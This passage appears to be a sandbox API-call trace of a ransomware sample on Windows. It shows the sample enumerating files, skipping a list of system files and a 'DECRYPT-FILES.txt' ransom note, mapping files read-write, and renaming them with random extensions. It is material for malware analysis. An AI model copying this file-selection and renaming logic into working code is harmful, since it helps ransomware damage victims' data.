lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0182.256] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0182.256] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0182.256] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0182.256] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0182.256] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0182.257] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0182.257] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0182.257] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0182.257] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0182.257] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0182.257] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0182.257] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0182.257] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0182.257] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0182.257] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0182.257] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0182.257] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0182.257] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0182.257] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0182.257] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0182.257] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb") returned 135 [0182.257] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb.Q3Dri") returned 141 [0182.257] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ucbmjb"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb.Q3Dri" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ucbmjb.q3dri"), dwFlags=0x0) returned 1 [0182.258] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.258] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.259] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.259] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb126c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5ddd1400, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xac09ccc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2507, dwReserved0=0x0, dwReserved1=0x0, cFileName="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", cAlternateFileName="BE7100~1.PTA")) returned 1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="DECRYPT-FILES.txt") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="autorun.inf") returned 1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="boot.ini") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="desktop.ini") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="ntuser.dat") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="iconcache.db") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="bootsect.bak") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="ntuser.dat.log") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="thumbs.db") returned -1 [0182.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms.ptaR9rA", lpString2="Bootfont.bin") returned -1 [0182.259] lstrlenW (lpString="be71009ff8bb02a2.customDestinations-ms.ptaR9rA") returned 46 [0182.259] lstrcmpiW (lpString1="ptaR9rA", lpString2="lnk") returned 1 [0182.259] lstrcmpiW (lpString1="ptaR9rA", lpString2="exe") returned 1 [0182.259] lstrcmpiW (lpString1="ptaR9rA", lpString2="sys") returned -1 [0182.259] lstrcmpiW (lpString1="ptaR9rA", lpString2="dll") returned 1 [0182.259] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.259] lstrlenW (lpString="be71009ff8bb02a2.customDestinations-ms.ptaR9rA") returned 46 [0182.259] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.259] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="be71009ff8bb02a2.customDestinations-ms.ptaR9rA" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.ptaR9rA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.ptaR9rA" [0182.259] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.ptaR9rA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms.ptar9ra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.260] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=9479) returned 1 [0182.260] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.260] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.261] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.261] CloseHandle (hObject=0x288) returned 1 [0182.261] CloseHandle (hObject=0x284) returned 1 [0182.261] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.261] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a388960, ftCreationTime.dwHighDateTime=0x1d42023, ftLastAccessTime.dwLowDateTime=0xce5f0760, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xac0e8f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2070, dwReserved0=0x0, dwReserved1=0x0, cFileName="d93f411851d7c929.customDestinations-ms.dnES", cAlternateFileName="D93F41~1.DNE")) returned 1 [0182.261] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="DECRYPT-FILES.txt") returned -1 [0182.261] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="autorun.inf") returned 1 [0182.261] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="boot.ini") returned 1 [0182.262] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="desktop.ini") returned -1 [0182.262] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="ntuser.dat") returned -1 [0182.262] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="iconcache.db") returned -1 [0182.262] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="bootsect.bak") returned 1 [0182.262] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="ntuser.dat.log") returned -1 [0182.262] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="thumbs.db") returned -1 [0182.262] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms.dnES", lpString2="Bootfont.bin") returned 1 [0182.262] lstrlenW (lpString="d93f411851d7c929.customDestinations-ms.dnES") returned 43 [0182.262] lstrcmpiW (lpString1="dnES", lpString2="lnk") returned -1 [0182.262] lstrcmpiW (lpString1="dnES", lpString2="exe") returned -1 [0182.262] lstrcmpiW (lpString1="dnES", lpString2="sys") returned -1 [0182.262] lstrcmpiW (lpString1="dnES", lpString2="dll") returned 1 [0182.262] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.262] lstrlenW (lpString="d93f411851d7c929.customDestinations-ms.dnES") returned 43 [0182.262] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.262] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="d93f411851d7c929.customDestinations-ms.dnES" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.dnES") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.dnES" [0182.262] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.dnES" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms.dnes"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.263] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=8304) returned 1 [0182.263] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.263] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.272] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.272] CloseHandle (hObject=0x288) returned 1 [0182.272] CloseHandle (hObject=0x284) returned 1 [0182.272] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.272] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabef9da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabef9da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabef9da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.272] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.272] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabef9da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabef9da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabef9da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0182.272] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0182.273] CloseHandle (hObject=0x27c) returned 1 [0182.273] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89917d50, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b027270, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b027270, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CySgPL_RS7_GjN8uh.lnk", cAlternateFileName="CYSGPL~1.LNK")) returned 1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="autorun.inf") returned 1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="boot.ini") returned 1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="desktop.ini") returned -1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="ntuser.dat") returned -1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="iconcache.db") returned -1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="bootsect.bak") returned 1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="ntuser.dat.log") returned -1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="thumbs.db") returned -1 [0182.273] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="Bootfont.bin") returned 1 [0182.273] lstrlenW (lpString="CySgPL_RS7_GjN8uh.lnk") returned 21 [0182.273] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.273] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a192bb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a192bb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a192bb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xee8, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZLwBD2he.lnk", cAlternateFileName="CZLWBD~1.LNK")) returned 1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="autorun.inf") returned 1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="boot.ini") returned 1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="desktop.ini") returned -1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="ntuser.dat") returned -1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="iconcache.db") returned -1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="bootsect.bak") returned 1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="ntuser.dat.log") returned -1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="thumbs.db") returned -1 [0182.273] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="Bootfont.bin") returned 1 [0182.273] lstrlenW (lpString="cZLwBD2he.lnk") returned 13 [0182.273] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.273] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe15560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabe15560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe15560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.273] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.273] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0182.274] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.274] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0182.274] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0182.274] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0182.274] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af68b90, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8af68b90, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8af68b90, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x0, cFileName="DNJ0jH17yLgW1.lnk", cAlternateFileName="DNJ0JH~1.LNK")) returned 1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="autorun.inf") returned 1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="boot.ini") returned 1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="desktop.ini") returned 1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="ntuser.dat") returned -1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="iconcache.db") returned -1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="bootsect.bak") returned 1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="ntuser.dat.log") returned -1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="thumbs.db") returned -1 [0182.274] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="Bootfont.bin") returned 1 [0182.274] lstrlenW (lpString="DNJ0jH17yLgW1.lnk") returned 17 [0182.274] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.274] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89f315b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89f315b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89f315b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xedc, dwReserved0=0x0, dwReserved1=0x0, cFileName="dZ3NoWA.flv.lnk", cAlternateFileName="DZ3NOW~1.LNK")) returned 1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="autorun.inf") returned 1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="boot.ini") returned 1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="desktop.ini") returned 1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="ntuser.dat") returned -1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="iconcache.db") returned -1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="bootsect.bak") returned 1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="thumbs.db") returned -1 [0182.274] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="Bootfont.bin") returned 1 [0182.274] lstrlenW (lpString="dZ3NoWA.flv.lnk") returned 15 [0182.274] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.274] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ccffb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89ccffb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89ccffb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZdoyBFOvdeUBph.lnk", cAlternateFileName="DZDOYB~1.LNK")) returned 1 [0182.274] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.274] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="autorun.inf") returned 1 [0182.274] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="boot.ini") returned 1 [0182.274] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="desktop.ini") returned 1 [0182.274] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="ntuser.dat") returned -1 [0182.275] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="iconcache.db") returned -1 [0182.275] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="bootsect.bak") returned 1 [0182.275] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="ntuser.dat.log") returned -1 [0182.275] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="thumbs.db") returned -1 [0182.275] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="Bootfont.bin") returned 1 [0182.275] lstrlenW (lpString="DZdoyBFOvdeUBph.lnk") returned 19 [0182.275] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.275] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9c1750, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a9c1750, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a9c1750, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ebf4.lnk", cAlternateFileName="")) returned 1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="autorun.inf") returned 1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="boot.ini") returned 1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="desktop.ini") returned 1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="ntuser.dat") returned -1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="iconcache.db") returned -1 [0182.275] lstrcmpiW 